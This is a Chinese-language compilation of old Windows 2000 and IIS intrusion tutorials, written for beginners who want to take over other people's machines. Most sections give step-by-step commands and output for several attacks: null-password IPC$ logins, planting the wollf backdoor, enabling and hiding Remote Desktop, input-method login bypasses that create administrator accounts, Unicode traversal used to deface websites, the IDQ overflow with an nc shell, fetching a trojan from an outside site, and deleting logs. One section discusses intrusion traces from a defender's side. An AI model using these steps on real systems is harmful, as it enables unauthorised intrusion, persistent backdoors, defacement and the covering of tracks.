怎樣從ipc$到開放3389到最後3389只為你服務

IPC掃描

獲得共享列表

g f e h I

獲得用戶列表

029 1 2 Administrator (Admin) Guest IUSR_SERVER IWAM_SERVER TsInternetUser

猜解成功用戶帳號 Administrator (Admin):(NULL)

隨便找了一台做實驗，先ipc$連上再說。
==========================================================================================
C:\\Documents and Settings\\shanlu.XZGJDOMAIN>net use \\\\218.22.155.*\\ipc$ "" /user:administrator
----------------連接成功！ 命令成功完成。

C:\\Documents and Settings\\shanlu.XZGJDOMAIN>copy wollf.exe \\\\218.22.155.*\\admin$
------------------------------拷貝wollf.exe到目標計算機的admin$目錄
已復制     1 個文件。

C:\\Documents and Settings\\shanlu.XZGJDOMAIN>copy hbulot.exe \\\\218.22.155.*\\admin$
-----------------------------拷貝hbulot.exe到目標計算機的admin$目錄
已復制     1 個文件。

C:\\Documents and Settings\\shanlu.XZGJDOMAIN>net time \\\\218.22.155.*
\\\\218.22.155.* 的當前時間是 2002/12/1 上午 06:37
命令成功完成。

C:\\Documents and Settings\\shanlu.XZGJDOMAIN>at \\\\218.22.155.* 06:39 wollf.exe
新加了一項作業，其作業 ID = 1--指定wollf.exe在06:39運行
------------------------------------------------------------------------------------------
說明：
wollf.exe是一個後門程序，很多高手都喜歡nc或者winshell，不過我對他情有獨鐘！在這裡我只介紹與本
文內容有關的命令參數，它的高級用法不做補充。
hbulot.exe是用於開啟3389服務，如果不是server及以上版本，就不要運行了。因為pro版不能安裝終端服務。
2分鐘後......

==========================================================================================
C:\\Documents and Settings\\shanlu.XZGJDOMAIN>wollf -connect 218.22.155.* 7614
"Wollf Remote Manager" v1.6
Code by wollf, http://www.xfocus.org
------------------------------------------------------------------------------------------
說明：
使用wollf連接時要注意wollf.exe要在當前目錄，它的連接命令格式：wollf -connect IP 7614
7614是wollf開放的端口。如果顯示如上，說明你已經連接成功，並具有管理員administrator權限。

==========================================================================================
[server@D:\\WINNT\\system32]#dos

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版權所有 1985-2000 Microsoft Corp.
------------------------------------------------------------------------------------------
說明：
輸入dos,你就會進入目標機的cmd下，這時同樣具有administrator權限。

==========================================================================================
D:\\WINNT\\system32>cd..
cd..

D:\\WINNT>dir h*.*
dir h*.*
驅動器 D 中的卷沒有標簽。
卷的序列號是 1CE5-2615

D:\\WINNT 的目錄

2002-11-27 03:07   

     Help
2002-09-10 12:16        10,752 hh.exe
2002-10-01 08:29        24,576 HBULOT.exe
        2 個文件     35,328 字節
        1 個目錄 9,049,604,096 可用字節

D:\\WINNT>hbulot
hbulot
------------------------------------------------------------------------------------------
說明：
因為我們把HBULOT.exe放到目標機的admin$下的，所以先找到它，以上是文件的存放位置。

==========================================================================================
D:\\WINNT>exit
exit

Command "DOS" succeed.

[server@D:\\WINNT\\system32]#reboot

Command "REBOOT" succeed.

[server@D:\\WINNT\\system32]#
Connection closed.
------------------------------------------------------------------------------------------
說明：
由dos退到wollf的連接模式下用exit命令，HBULOT.exe運行後需重新啟動方可生效，這裡wollf自帶的REBOOT命令，執行過在5秒後你就會失去連接。啟動完畢後檢查一下3389端口是否開放，方法很多，superscan3掃一下。這時候你就可以登陸了。如果沒有開放3389那就不是server及以上版本，就不要運行了。因為pro版不能安裝終端服務。到這裡，你已經擁有3389肉雞了！但是會不會被別的入侵者發現呢？下面所教的就是怎麼讓3389只為你服務！我們現在使用的3389登陸器有兩種版本，一種是2000/98，一種是XP。二者區別呢？前者使用的默認端口3389對目標，後者默認的也是3389端口，但是它還支持別的端口進行連接！所以呢......我們來修改3389的連接端口來躲過普通掃描器的掃描！修改方法如下：
修改服務器端的端口設置 ，注冊表有2個地方需要修改。
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp] PortNumber值，默認是3389，修改成所希望的端口，比如1314
第二個地方： 
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]PortNumber值，默認是3389，修改成所希望的端口，比如1314 
現在這樣就可以了。重啟系統吧。 
注意：事實上，只修改第二處也是可以的。另外，第二處的標准聯結應該是 
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\ 
表示具體的某個RDP-TCP連結。
重啟過後，看看端口有沒有改。
小技巧：修改注冊表鍵值時，先選擇10進制，輸入你希望的端口數值，再選擇16進制，系統會自動轉換。

建立3389
建立批命令.包含以下信息
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
用IPC傳到對方機器後,net time得出對方時間然後at運行此批命令
五六分鐘以後對方機器重起可3389登陸
以此類推,可以在有IPC賬號情況下以批命令運行任何可運行的命令,如加賬號,開各種服務等!
3389肉雞深入討論　
序言
很多菜鳥擁有了第一台肉雞後，水平一日千裡，功夫飙升。所以有肉雞是菜鳥成為高手的 漫漫長路上的第一個目標。
本文將我個人的一些辦法（可能很土）與大家分享。
方法一）安裝服務
我知道很多人都有format 硬盤的壞習慣，我以前也有，現在徹底改邪歸正了。
如果找到一台有漏洞的機器（我這裡專指可以拿到權限的win2K機器），由於沒有開現成的端口，而輕易黑掉，是很可惜的。他沒有開，我們可以給他開嘛。

對於win2000，很多人進去都喜歡net start TermService，一般由於該服務被禁用，是開啟不成功的，那麼我們想一點別的辦法。：）

我們會用Windows 2000下的Resource Kits中的一個工具instsrv創建一個服務，instsrv的用法如下，當然，你也可以用其他的工具來實現（如srvinstw，GUI方式的）。
C:\>instsrv
Installs and removes system services from NT
INSTSRV ( | REMOVE)
[-a ] [-p ]
Install service example:
INSTSRV MyService C:\MyDir\DiskService.Exe
-OR-
INSTSRV MyService C:\mailsrv\mailsrv.exe -a MYDOMAIN\joebob -p foo
Remove service example:
INSTSRV MyService REMOVE
大家現在明白了吧？
先instsrv TermService REMOVE
然後給他再裝上終端服務instsrv Winlogonservice c:\winnt\system32\termsrv.exe
嘿嘿，只要c:\winnt\system32\termsrv.exe存在，就可以給他裝上一個叫做Winlogonservice的服務，而且是自動啟動，哈哈～～
不妨在送個reboot.exe給他，然後用at \\xxx.xxx.xxx.xxx 23:30 reboot.exe
這樣他重啟過後我們就能連接他的3389了。：）

方法二）對於終端服務設置為已禁止的機器
使用win2000無人職守工具sysocmgr.exe:
echo [Components] > c:\bootlog.txt
echo TSEnabled = on >> c:\bootlog.txt
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\bootlog.txt /q
sysocmgr的用法請自己到命令行下輸入 sysocmgr[回車] 看看幫助，寫得很清楚，上面的參數大致不變；如果你不想對方馬上重啟，輸入 /r 選項，擬制重啟(防止被發現)：
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\bootlog.txt /q /r

方法三）修改對方服務設置或者直接修改注冊表（成功率相對較低）
1、在regedit中菜單“注冊表”－》“連接網絡注冊表”
HKEY_LOCAL_MACHINE－》SYSTEM－》CurrentControlSet－》Services－》Termservice
將start鍵值修改為2－》退出regedit
想辦法讓對方機器重啟（reboot.exe很管用）
2、我的電腦－》管理－》服務－》Terminal Services－》屬性－》自動－》確定－》啟動Terminal Services（成功率不是很高）

進入肉雞後，請大家幫助升級，打補丁，堵漏洞（肉雞多半也是國內的嘛），然後她就會為你忠實服務了。
對於sa弱密碼進入系統的菜鳥，記得到 開始－》程序－》mssql server->enterprise management->。。。。－》security->logins裡面給自己加個帳戶（不要是DBO，會有麻煩），當然權限和sa相同，然後修改sa密碼(嘿嘿，獨占，這樣“她的眼裡只有你”)。
======== 續 ＝＝＝＝＝
1）所謂“萬能3389攻擊”的具體攻擊辦法：

3389連接目標的時候，點擊服務器地址欄，點擊任務欄輸入法，選擇清華紫光（或者別的什麼鳥輸入法，只要能看幫助就行）；
連接到3389服務器，如果對方剛好有這個輸入法，那麼就用輸入法漏洞利用方法一樣（差別是有的，關鍵在：找到什麼地方有“打開文件”或者“保存文件”對話框出現）；

2）漏洞存在的原因及解決思路：

鑒於第三方輸入法都是系統及相關應用軟件（SQL server 、IIS、補丁等）裝好後才考慮的事情，這個幫助文件一般也不是放在%systemroot%\help下面，所以刪除這個目錄下面的win*是沒有用的，必須到安裝目錄去刪除.cnt或者*.hlp文件才行。
說得科學一點是這樣：第三方軟件設計缺陷導致系統出現漏洞；
說得玄乎一點就是系統打不打補丁都一樣能黑。
由於第三方軟件不在MS Service pack范圍內，當然與sp 無關。

聽著這兩種表示方式，大家覺得那樣比較好？
（我認為科學得態度是首要的，不要學李紅痔故弄玄虛，把握事情本質才是我們追求的）

3）體驗
這是輸入法漏洞利用的延伸，我曾經用清華紫光的這個幫助裡面的“添加打印機”（好像是）然後彈出的”保存文件“對話框內，找個可執行文件，右鍵點擊－》“建立快捷方式”－》快捷方式“屬性”＝》net user ......－》確定－》右鍵點擊－》打開（也就是執行）
成功進入過一些機器。

4）題外話
另外，除非你運氣特別好，否則比較難遇到，因為服務器上裝東西的原則是：只要夠用就行。

5）最後給想做“超級黑客”的朋友的建議：多動腦和手；嘴巴吃飯喝酒比較累，一定要讓它多多休息。

3389入侵後實現上傳下載的簡單方法
　其實這是很簡單的:
首先你必須要有一個主頁空間,八要上傳的文件先上傳到主頁,然後打開終端,連接服務器,
跳至url中http://主頁/文件
如http://tnt168.51.net/sys.exe
然後會出現下載的頁面,保存或運行,
實現下載是這樣的:
現在浏覽器中//ip/scripts/cmd.exe?/c+copy+目標文件 c:\inetpub\wwwroot\目標文件.zip
然後就可以實現下載了,~o~
但下載後怎麼運行?很簡單,改變她的屬性:
察看--->文件夾選項--->察看--->將"隱藏已知的文件的擴展名"的勾去掉
再回到文件,將它重命名,改屬性為原來的屬性
如http://ip/cmd.zip(把cmd.exe改為了cmd.zip實現下載) 然後執行上面的步驟,改回cmd.exe就可以了!
這樣我們就能實現上傳下載了!我們把上載的文件改為一個不被病毒防火牆所查殺的木馬(推薦木馬信使tnt168.51.net/systtem.zip)
我們就能長期控制和知道她的密碼了
具體的方法相信大家都知道了,我不再羅嗦了
(cmd.exe請改名為其他以奪過檢查)
486 也跑 WIN2000 — WIN2000 輸入法漏洞應用實例
你是否也曾有一台牛 B 一時的 486 呢？如果它老人家還健在，那麼，別在多想，快快拍拍它身上的灰塵，讓我們一同享受 WIN2000 帶來的歡樂。

  最近有許多網友來信咨詢 WIN2000 上輸入法漏洞怎樣利用，有多大價值。的確，初看這個漏洞屬於本地漏洞，我們不可能為了用這個漏洞時跑到人家機房去試驗，那也是不現實的。但大家卻忽略了一個問題，就是 WIN2000 的遠程共享功能。有許多粗心的網絡管理員在安裝 WIN2000 時會不加選擇的安裝全部組件，這樣， WIN2000 的遠程共享功能就成為一個合法的天然超級木馬。

  具體怎樣用呢？聽我一一道來：

  我試驗的機器為 486 DX2/100 ＋ 8M 內存＋ 512M ＋ WIN95 中文版＋ MODEM （呵呵，艱苦樸素是中華民族的傳統美德）

1. 使用端口掃描工具。掃描一個網段內的 3389 端口。因為 WIN2000 的遠程共享功能就是通過這個端口實現的。建議使用小榕編寫的“流光 2001 ”＋“ IP 限制破解補丁”，這樣你 就可以很容易迅速找到有遠程共享的 WIN2000 主機。如圖（一）

 

2. 使用“ WIN2000 終端”直接與目標 IP 進行連接。如圖（二）

 

 

3. 出現登入界面時，會要求你輸入密碼。不知道密碼不要緊，這時就可以應用 WIN2000 輸入法漏洞了！輸入 CTRL ＋ SHIFT 切換當前輸入法到“智能 ABC ”，你可以通過“智能 ABC ”輸入法的狀態界面調出它的幫助系統。如圖（三）用 MOUSE 單擊幫助系統窗體左上角，在“ URL 轉至：”中輸入“ C ：”回車。如圖（四）快看，右側的幫助正文窗體中列出了對方 C 盤的目錄。這時，你可以用 MOUSE 右擊對方 C 盤文件夾，進行打開文件夾或啟動資源管理器等操作，然後進入對方的 WINNT 主目錄中下載 SAM ，（經實驗某些版本 WIN2000 無法直接打開文件夾或啟動資源管理器，但你仍然可以改變 C 盤或文件夾屬性並設為共享。然後用 NET 命令下載對方的 SAM 密碼文件）。如圖（五）

 

 

4. 下面，你需要做的就是找一個破解 SAM 是軟件，對剛下載的 SAM 進行窮舉破解。

5. 一但密碼破解成功後，恭喜你，那台 WIN2000 就歸你用了！用“ WIN2000 終端”連入對方機器，你就可以盡情享受 WIN2000 的強大功能。在上面用流光跑跑 e － mail 密碼，如果你有 128k 帶寬的話，還可以看看 486 無力解碼的 RM 或 DVD 。“爽”就一個字，我只說一次！

  漏洞的初步補救方案：因為此漏洞在 WIN98 ～ WIN2000 ＋ SP1 中各版本均存在，所以目前只有兩個辦法：

1. 不安裝 WIN2000 遠程共享功能

2. 刪除“智能 ABC ”“鄭碼”等輸入法，僅存英文和“微軟智能拼音”

          關於 WIN2000 遠程共享功能的擴展應用

  在譽兒本地的眾多網吧中，大多數組網采用 WIN98 對等網＋ SYGATE 或 WINGATE 。

其成本大約是：     工作站：賽揚 533A ＋ 15 寸彩顯＋ 64M 內存＋ 15G 硬盤＋ TNT2 顯卡    

          3800 ～ 4000 元 / 台   ×   20 台   ＝ 80000 元 （選其中一台作服務器）

  而使用 WIN2000 遠程共享功能組網

其成本大約是：   服務器一台：雙奔三－ 800 、 512M 內存、 30G 硬盤、 WIN2000Server   15000 元

          工作站：奔騰－ 75 ＋ 512M 硬盤＋ 17 寸彩顯（二手）＋ WIN95 2000 元 / 台× 20 ＝ 40000 元

          合計： 65000 元

  這樣你一下就省了近 20 ％，偷著樂去吧！譽兒前些天就幫朋友作了一個這樣的網吧。而且還在 Server 上裝了個 NETSONIC 加速軟件，由於 20 台工作站緩存集中，所以速度成倍提高。

優缺點比較：   WIN98                       WIN2000

    不穩定 ，易死機，難維護   穩定，不死機，使用活動目錄技術，易維護，統一管理     網絡功能單一           網絡功能強大

由於使用 SYGATE 網關，       UDP 、 TCP 全部正常

OICQ 等軟件無法使用 TCP 協  

議進行連接，不能進行“二        

人世界”“文件傳輸”等        

  可以玩單機游戲           不能玩單機游戲

 

  總結：

    事物都有兩面性，上述例子就很明顯，關鍵還是如何正確利用技術。用的好可以省錢省心；用的不好，就只能作為黑客們的肉雞了。呵： p
WIN2000的輸入法入侵
這是一種入侵簡單，但造成用戶損失後果最嚴重的一種入侵方法，嚴禁入侵國內主機！請慎用之！！！

（使用系統：WIN98/ME/2000/NT）這個方法對簡體WIN2000有效。所以練習可以，但不要破壞。如果懂NET和IPC管道入侵的學者更容易學。

一 准備工具：WIN2000終端服務客戶端程序，SQLEXEC程序，SUPERSCAN掃描器。

二 我們先運行SUPERSCAN掃描器，掃描器設置如圖：

SUPERSCAN設置

注意：主要是改二個地方：一個IP地址，另一個端口改成3389.

三 我們掃出有3389端口打開的主機後，用SQLEXEC程序看看能不能創建新用戶。如果不能創建就放棄，（當然還有另一種方法，下面再說。）如果我們能用NET USER創建用戶，並把用戶加到ADMINISTRATORS組的話，那恭喜你。准備登陸。

四 我們打開WIN2000 客戶端程序。在最上面一項填入對方的IP。其他項不用改。按連接。過幾秒後客戶程序會打開一個窗口：

五 這個畫面相信你很熟悉了吧，在使用者名稱填入你剛才創建的用戶名，密碼欄填入你創建的密碼然後按確定。呵呵，等一會（具體時間要看網速）就登陸到對方機器的窗口了。如圖

登陸成功窗口

六 你可以看到對方主機的所有內容了，（怎麼感覺有點象冰河？呵，冰河也沒有這麼直觀呀）等於你強占了對方的機器，它的生殺大權就都在你手裡了。可別干壞事啊。呵呵。進去後記住要刪除入侵記錄。把c:winnt\system32\logfiles\*.* 文件刪除。別刪錯了呀。

上面的方法優點在於可以直接輸入用戶名和密碼就能登陸，缺點是要用SQLEXEC一個一個試。還有一種方法：此方法適合於熟練掌握NET命令的學員。

我們用SUPERSCAN先對一個網段進行掃描，掃描端口設為3389，運行客戶端連接管理器，將掃描到的任一地址加入到，設置好客戶端連接管理器，然後與服務器連結。幾秒鐘後，屏幕上顯示出WIN2000登錄界面（如果發現是英文或繁體中文版，放棄，另換一個地址），用CTRL+SHIFT快速切換輸入法，切換至全拼，這時在登錄界面左下角將出現輸入法狀態條（如果沒有出現，請耐心等待，因為對方的數據流傳輸還有一個過程）。用右鍵點擊狀態條上的微軟徽標，彈出“幫助”（如果發現“幫助”呈灰色，放棄，因為對方很可能發現並已經補上了這個漏洞），打開“幫助”一欄中“操作指南”，在最上面的任務欄點擊右鍵，會彈出一個菜單，打開“跳至URL”。此時將出現WIN2000的系統安裝路徑和要求我們填入的路徑的空白欄。比如，該系統安裝在Ｃ盤上，就在空白欄中填入“c:\winnt\system32”。然後按“確定”，於是我們就成功地繞過了身份驗證，進入了系統的SYSTEM32目錄。 現在我們要獲得一個賬號，成為系統的合法用戶。在該目錄下找到net.exe”，為net.exe”創建一個快捷方式，右鍵點擊該快捷方式，在“屬性”－>“目標”－>c:\winnt\system32\net.exe後面空一格，填入user 用戶名 密碼／add”，創建一個新賬號，運行該快捷方式，此時你不會看到運行狀態，但新用戶已被激活。然後又修改該快捷方式，填入localgroup administrators 新用戶 /add，將新用戶變成系統管理員。大家可以用SQL和IPC管道命令進入了。
對win2000的攻擊
對win2000的攻擊（新手不要錯過） 由於Win2000操作系統良好的網絡功能，因此在因特網中有部分網站服務器開始使用的Win2000作為主操作系 統的。但由於該操作系統是一個多用戶操作系統，黑客們為了在攻擊中隱藏自己，往往會選擇Win2000作為首先 攻擊的對象。攻擊win2000通常有余下比較簡單的方法： 圖形界面，遠程登陸3389端口的攻擊，下載superscan3.zip在地址：http://www.heibai.net/download/show.php?id=2 406在黑白上有。填上起始和停止的ip地址段，“所有端口從”3389到3389然後單擊開始掃描，把掃描到的活動主機復制到剪貼 版。然後下載X-Scan-v1.3.zip在地址： http://www.heibai.net/download/show.php?id=1 486也是黑白上的工具注意下載後要解壓縮。運行xscan_gui在基本設置裡填人剛才掃描的活動主機（粘貼剛才到剪貼版上即可）在掃描模塊裡選擇 sql-server弱口令和nt-server弱口令即可，等會我們要用到這，其他設置不變。當得到用戶名和密碼：202.120.5.2**的sql或win2000用戶名和密碼！哈哈現在好了，已經成功一大半了。 sql 密碼sa （null） 去http://hdsafe.com/down/soft.asp?id=19下載sql 遠程入侵工具sqlexec.exe 通過sql登陸到主機上，然後在主機上添加用戶。具體步驟如下： （一）輸入命令：net user heibao 1006 /add 回車添加一般用戶（二）輸入命令：net localgroup administrators heibao /add 回車將heibao添加到高級管理員組！ 去hdsafe.com下載清風火舞win2000登陸器，填人ip地址：202.120.2.2** 連接，填上用戶名heibao和密碼1006即可進入系統。 掃描到win2000用戶名admini ，密碼：password 即可用清風火舞win2000登陸器直接進入即可哈哈，到現在我們有自己的肉雞了，在肉雞上我們可以干自己想干的事情，當然不能太過火了。注意： 1.如果本文提供的網址不能下載，則可用google.com搜索即可。 2.終端最大連接數問題的解決，telnet進去，然後輸入logoff 1 （1為id好號）

分析進入Win2000後留下的足跡
很多人對入侵Win2000系統很喜歡的吧，又有3389這樣的界面型遠程控制，還有這麼多漏洞可以利用，而且關於入侵Win2000的文章又到處都是，方便啊。 不過，你知道，你到底留下了哪些足跡在系統中麼？最近作了個入侵分析，發現了不少東西，當然，估計到入侵時間然後在查找文件就列出來了。我們在這裡不分析來自FTP、HTTP的日志記錄，因為這樣來的入侵行為分析和防范比較容易，而通過帳號密碼猜測進來的防范起來是比較麻煩的（安全配置相當OK的另說）。 1、系統的日志記錄。 好的管理員應該盡可能地記錄可以記錄的東西，在本地安全策略中，對審核策略進行足夠多的記錄，你能發現，如果把所有的審核都選定的話（只要你不嫌多），一個帳號進行的操作訪問的整個過程都能夠完整記錄下來了，一點不漏。 事件查看器裡記錄的內容是最多的了，從安全日志裡面可以查看所有審核的事件。 我們看看一個帳號的登錄/注銷事件的記錄： 會話從 winstation 中斷連接: 用戶名: guest 域: Refdom 登錄 ID: (0x0,0x28445D9) 會話名稱: Unknown 客戶端名: GUDULOVER 客戶端地址: 202.103.117.94 這是一個3389登錄的事件，系統記錄下了IP地址，機器名稱以及使用的用戶名。還是很齊全的吧。 這是一個詳細追蹤的記錄： 已經創建新的過程: 新的過程 ID: 4269918848 映象文件名: \WINNT\system32\CMD.EXE 創建者過程 ID: 2168673888 用戶名: Refdom$ 域: Refdom 登錄 ID: (0x0,0x3E7) 這是使用localsystem來運行了cmd.exe的記錄，呵呵，用本地系統帳號運行cmd.exe不是用net user還是什麼（當然還能做很多事情）。 小心自己的日志記錄太多，日志空間使用滿，這樣WIN就不再記錄新的事件了，請在日志屬性中選擇按需要改寫日志，這樣可以記錄新的事件，不過可能把需要分析的事件給改寫了。 可惜的是，這裡的記錄實在是太顯眼了，多半存活不了。 2、足夠多的痕跡留在“Documents and Settings”目錄裡面 這個目錄是所有帳號的足跡存放地，當然，從3389或者本機進入使用圖形界面就會留下帳號目錄來。我們來看看一個帳號的“Documents and Settings”目錄裡面有什麼東西吧，首先查看所有文件和文件夾，不要隱藏任何東西。 “「開始」菜單”：當然是存放帳號自己的“開始”中的東西，這個裡面的“啟動”是個比較好東西哦。 “Application Data”：一些應用程序留下的數據啊、備份啊什麼的東西，分析用處不怎麼大。 “Cookies”：如果入侵者通過3389進來，還去浏覽了網頁，那麼這裡就存放著足夠多的Cookie，讓你能夠知道他到底去了哪些地方。 “Local Settings”，這裡也是一些臨時數據的存放地，還有就是IE的脫機東東。說不定能發現很多好網站哦。 “Recent”：這個文件夾是隱藏的，不過裡面存放的東西實在太多了，帳號訪問的目錄、文件一個一個都記錄在案。使用了哪些東西，看了哪些文件，都能知道得清清楚楚。 “Templates”：存放臨時文件的地方。 3、從黑客工具看 被人入侵了，那他一定會想辦法獲得administrator權限，得到了這個權限他就能為所欲為了，按照各種介紹的入侵教材，當然是放置其他掃描器做肉雞、安裝後門、刪除日志……呵呵，這些掃描器都有足夠的日志可以提供分析，還能幫自己白白收集一些肉雞。而且從這些工具的日志（配置文件）裡面也可以看出入侵者的意圖以及水平等等。 也好，那流光來說吧，每次掃描的結果都寫下來了，大家都可以看，不看白不看。 被安裝後門、代理跳板（不是多級）是最好的了，誰能遠程控制你做什麼呢？我們當然可以從後門程序抓住入侵者的來歷，從哪裡傳過來的連接，用嗅歎器就是了，當然，你甚至可以用一個非常有意思的文件名來偽裝自己的木馬，讓他當回去使用，想玩大家一起玩啊。當然，從另外的3389肉雞這樣的控制來的入侵者還是只找到的他的肉雞而已。（冒險，把他的肉雞也搞定吧）

由於網上很多朋友問我怎麼入侵別人的機器，所以整理了一些我認為容易學的漏洞入侵方法，希望能給初學者一些幫助，下面講的內容很簡單，高手就不用浪費時間看了，：）

（1） UNICODE漏洞入侵
“Uicode漏洞”是微軟IIS的一個重大漏洞。2001年最熱門漏洞之一。
第一步，運行RANGSCAN掃描器，會出現掃描窗口，在最上面有兩個from的橫框，這是讓你填一段IP范圍的。在第一個框裡填入啟始域（打個比方，比如你要掃192.168.0.1至192.168.0.255）那麼你在第一個框裡就填入192.168.0.1，在to 後面的框裡填入192.168.0.255 意思就是掃192.168.0.0至192.168.0.255這段范圍裡有UNICODE漏洞的機器。接著在中間有一個添加的橫框，是要填入內容的如：
/scripts/..%c0%af../winnt/system32/cmd.exe
這句話的意思是掃描有 %c0%af 漏洞的機器，對象一般是英文的WIN2000機。
我們把/scripts/..%c0%af../winnt/system32/cmd.exe填入框裡，再按一下添加。再按“掃描”。就看到RANGSCAN開始掃了。這時就要看你選的IP范圍有漏洞的機器多不多了，如果你選的IP范圍好，呵，很快在掃描結果框裡就會顯示掃到的漏洞主機
如192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe
意思是192.168.0.111主機有 %c0%af 漏洞，
目標有了，我們馬上打開浏覽器。在網址欄裡輸入：
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 回車
意思是查看機器裡C盤的根目錄。一般情況下，我們都可以在浏覽器裡看到類似如：
Directory of c:\
2002-03-13 03:47p 289 default.asp
2002-02-11 03:47p 289 default.htm
2002-03-09 04:35p
Documents and Settings
2002-02-11 03:47p 289 index.asp
2002-02-11 03:47p 289 index.htm
2002-05-08 05:19a
Inetpub
2002-01-19 10:37p
MSSQL7
2002-03-09 04:22p
Program Files
2002-01-23 06:21p
WINNT
4 File(s) 1,156 bytes
5 Dir(s) 2,461,421,568 bytes free
------------------------------
的目錄列表。也會碰到看不到文件的空目錄。
好，我們成功看到了機器裡的C盤了。
我們在浏覽器裡輸入：
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set 回車
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:

ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=ON
ComSpec=C:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=192.168.0.111
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_ID=1
LOCAL_ADDR=192.168.0.111
NUMBER_OF_PROCESSORS=1
Os2LibPath=C:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;C:\MSSQL7\BINN
PATH_TRANSLATED=c:\inetpub\wwwroot
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Fa
-----------------
哈，我們看到了機器設置內容了，我們找找，主要看PATH_TRANSLATED=c:\inetpub\wwwroot
意思是他的主頁存放在c:\inetpub\wwwroot的目錄裡，知道就好辦了。
我們用命令：
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot回車
我們就可以看到c:\inetpub\wwwroot目錄裡的文件了，一般都有default.asp, default.htm , index.htm, index.asp,等等。我們以目錄裡有index.asp做例子。
我們先要做的是把文件的只讀屬性解除掉，很多管理員都把文件設置只讀。
我們用命令：
192.168.0.111/scripts/..%c0%af../winnt/system32/attrib.exe?%20-r%20-h%20c:\inetpub\wwwroot\index.asp 回車
當看到下面的英文
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
恭喜你，你可以改他的網頁了。
----------------------------------------
但如果你看到下面的英文就不成功，只好換其他機器了。
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access denied - C:\inetpub\wwwroot\index.asp
-----------------------------
繼續。現在用ECHO改網頁的內容。
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd".exe?/c+echo+網站有漏洞+> c:\inetpub\wwwroot\index.asp 回車
當看到
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
的提示，你已經改了他的網頁了，呵呵，你想改成什麼字也行。只要把命令中的中文換成你自己的中文就行了。

英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
中文WIN2000
/scripts/..%c0%2f../winnt/system32/cmd.exe
/scripts/..%c1%1c../winnt/system32/cmd.exe
WIN NT4
/scripts/..%c1%9c../winnt/system32/cmd.exe
英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe
通用代碼：/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

（2） Windows2000輸入法漏洞
先用端口掃描器掃描開放3389的機器，然後用終端客戶端程序進行連接，用CTRL+SHIFT快速切換輸入法，切換至全拼，這時在登錄界面左下角將出現輸入法狀態條，在輸入法狀態條上按鼠標右鍵。選擇“幫助” —— “輸入法指南” —— “選項”。（如果發現“幫助”呈灰色，放棄，因為對方很可能發現並已經補上了這個漏洞。）按右鍵，選擇“跳轉到URL”，輸入：c:\winnt\system32在該目錄下找到“net.exe”，為“net.exe”創建一個快捷方式，右鍵點擊該快捷方式，在“屬性” —“目標”—c:\winnt\system32\net.exe 後面空一格，填入“user guest /active :yes”。 點擊“確定”（目的是，利用“net.exe”激活被禁止使用的guest賬戶）運行該快捷方式。（此時你不會看到運行狀態，但guest用戶已被激活。）然後重復操作上面的，在 “屬性” —— “目標”—— c:\winnt\system32\net.exe 後面空一格，填入localgroup administrators guest /add（這一步驟目的是，利用“net.exe”將guest變成系統管理員。）再次登錄終端服務器，以“guest”身份進入，此時guest已是系統管理員，已具備一切可執行權及一切操作權限。現在，我們可以像操作本地主機一樣，控制對方系統。
（3） idq溢出漏洞
要用到3個程序，一個Snake IIS IDQ 溢出程序GUI版本，一個掃描器，還有NC。
首先掃描一台有IDQ漏洞的機器，然後設置Snake IIS IDQ 溢出程序，在被攻擊IP地址後面寫上對方的IP.端口號一般不需要改動，軟件的默認綁定CMD.EXE的端口是813.不改了.用默認的，左面選擇操作系統類型，隨便選一個，我們選IIS5 English Win2k Sp0吧，點擊IDQ溢出~~OK~~出現發送Shellcode成功的提示了，然後我們用NC來連接。
進入MS-DOS。進入“nc”的目錄。然後：nc --v IP 813
c:\>nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?): connection refused
sent 0, rcvd 0: NOTSOCK
c:\>

看來沒成功. 別灰心，在來一次，換用IIS5 English Win2k Sp1試試。
c:\>nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
哈哈，終於上來啦，你現在可是system權限，下面該怎麼做就看你的啦。

